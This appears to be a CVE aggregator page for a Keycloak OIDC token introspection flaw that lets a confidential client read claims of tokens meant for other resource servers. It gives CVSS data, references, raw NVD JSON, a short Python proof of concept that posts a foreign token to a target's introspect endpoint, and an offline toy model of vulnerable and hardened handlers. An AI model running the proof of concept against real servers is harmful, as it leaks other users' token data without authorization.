Security Vulnerability Report
CVE-2026-37979 CVSS 6.5 MEDIUM

CVE-2026-37979

Published: 2026-05-19 12:16:18
Last Modified: 2026-05-20 17:16:22

Description

A flaw was found in Keycloak. This access control vulnerability in Keycloak's OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (for the specific affected versions, refer to the Red Hat security advisory RHSA-2026:19596)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Keycloak Target Configuration
KEYCLOAK_URL = "https://target-keycloak.com/realms/master/protocol/openid-connect/token/introspect"
CLIENT_ID = "attacker-controlled-client"
CLIENT_SECRET = "valid-client-secret"
TARGET_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."  # Token intended for a different resource server

# Exploit Payload: the calling client authenticates with its own credentials
# (client_secret_post) and asks the realm to introspect a token whose audience
# does not include it.
data = {
    "client_id": CLIENT_ID,
    "client_secret": CLIENT_SECRET,
    "token": TARGET_TOKEN,
}

response = requests.post(KEYCLOAK_URL, data=data, timeout=10)
if response.status_code == 200:
    result = response.json()
    # If active is true, the attacker successfully bypassed audience restrictions:
    # the full claim set of a token meant for another resource server is returned.
    if result.get("active"):
        print("[+] Vulnerability Exploited! Token details leaked:")
        print(result)
    else:
        print("[-] Token is inactive or invalid.")
else:
    print(f"[-] Request failed with status code: {response.status_code}")
```
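The PoC above needs a live realm. The following added example (not from this page, Red Hat or Keycloak) models the access-control decision offline: a constructed toy realm issues a lightweight token whose sensitive claims live only server-side, then introspects it through a handler that mirrors the behaviour the advisory describes (any authenticated confidential client in the realm receives the claims) and a hardened handler that answers only `{"active": false}` to a caller that is not in the token's `aud`, as RFC 7662 section 2.2 requires for a resource that is not allowed to introspect that token. The HMAC key, the client registry, the claim names and every helper here are assumptions for illustration, not Keycloak's code or its actual fix.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# --- Constructed toy realm (assumptions standing in for Keycloak's realm state) ---
REALM_KEY = b"toy-realm-hmac-key"          # toy HS256 key; a real realm signs with RS256
CONFIDENTIAL_CLIENTS = {                   # client_id -> client_secret (constructed)
    "billing-api": "secret-billing",
    "attacker-controlled-client": "secret-attacker",
}
# Lightweight tokens carry only a reference; the sensitive claims stay server-side,
# so introspection is the only way to read them.
TOKEN_STORE: dict = {}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_lightweight_token(sub: str, aud, sensitive: dict, ttl: int = 300) -> str:
    """Issue a short JWT (sub, aud, jti, exp) and park the sensitive claims server-side."""
    jti = secrets.token_hex(8)
    TOKEN_STORE[jti] = dict(sensitive)
    claims = {"sub": sub, "aud": aud, "jti": jti, "exp": int(time.time()) + ttl}
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims).encode())
    sig = hmac.new(REALM_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_token(token: str) -> Optional[dict]:
    """Return the token's own claims if signature and expiry check out, else None."""
    try:
        header, body, sig = token.split(".")
        expected = hmac.new(REALM_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig)):
            return None
        claims = json.loads(_b64url_decode(body))
    except ValueError:  # bad structure, bad base64 or bad JSON
        return None
    if claims.get("exp", 0) <= time.time():
        return None
    return claims


def authenticate_client(client_id: str, client_secret: str) -> bool:
    """client_secret_post style authentication of the introspecting client."""
    secret = CONFIDENTIAL_CLIENTS.get(client_id)
    return secret is not None and hmac.compare_digest(secret, client_secret)


def _full_claims(claims: dict) -> dict:
    """Merge the server-side sensitive claims back in; this is what introspection reveals."""
    return {"active": True, **claims, **TOKEN_STORE.get(claims.get("jti"), {})}


def introspect_vulnerable(client_id: str, client_secret: str, token: str) -> dict:
    """Behaviour the advisory describes: any confidential client in the realm sees everything."""
    if not authenticate_client(client_id, client_secret):
        return {"error": "invalid_client"}
    claims = verify_token(token)
    if claims is None:
        return {"active": False}
    return _full_claims(claims)


def introspect_hardened(client_id: str, client_secret: str, token: str) -> dict:
    """Same, but the caller must be one of the token's audiences (RFC 7662 section 2.2)."""
    if not authenticate_client(client_id, client_secret):
        return {"error": "invalid_client"}
    claims = verify_token(token)
    if claims is None:
        return {"active": False}
    aud = claims.get("aud", [])
    audiences = [aud] if isinstance(aud, str) else list(aud)
    if client_id not in audiences:
        # A caller not allowed to introspect this token learns nothing beyond active=false.
        return {"active": False}
    return _full_claims(claims)


if __name__ == "__main__":
    tok = mint_lightweight_token("alice", "billing-api",
                                 {"email": "alice@example.com", "roles": ["billing-admin"]})
    print("vulnerable :", introspect_vulnerable("attacker-controlled-client", "secret-attacker", tok))
    print("hardened   :", introspect_hardened("attacker-controlled-client", "secret-attacker", tok))
    print("legit aud  :", introspect_hardened("billing-api", "secret-billing", tok))
```

The hardened handler deliberately returns the same `{"active": false}` for "not your token" as for "expired" or "bad signature": distinguishing the cases would itself leak that a valid token for another audience exists. Note that the `aud` claim may be a string or a list, and a check that only handles one form is a common way to lose the restriction again.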

References

https://access.redhat.com/errata/RHSA-2026:19596
https://access.redhat.com/errata/RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-37979
https://bugzilla.redhat.com/show_bug.cgi?id=2455328

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-37979",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T12:16:18.330",
    "lastModified": "2026-05-20T17:16:21.807",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak. This access control vulnerability in Keycloak's OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:19596",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:19597",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/security/cve/CVE-2026-37979",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455328",
        "source": "[email protected]"
      }
    ]
  }
}
```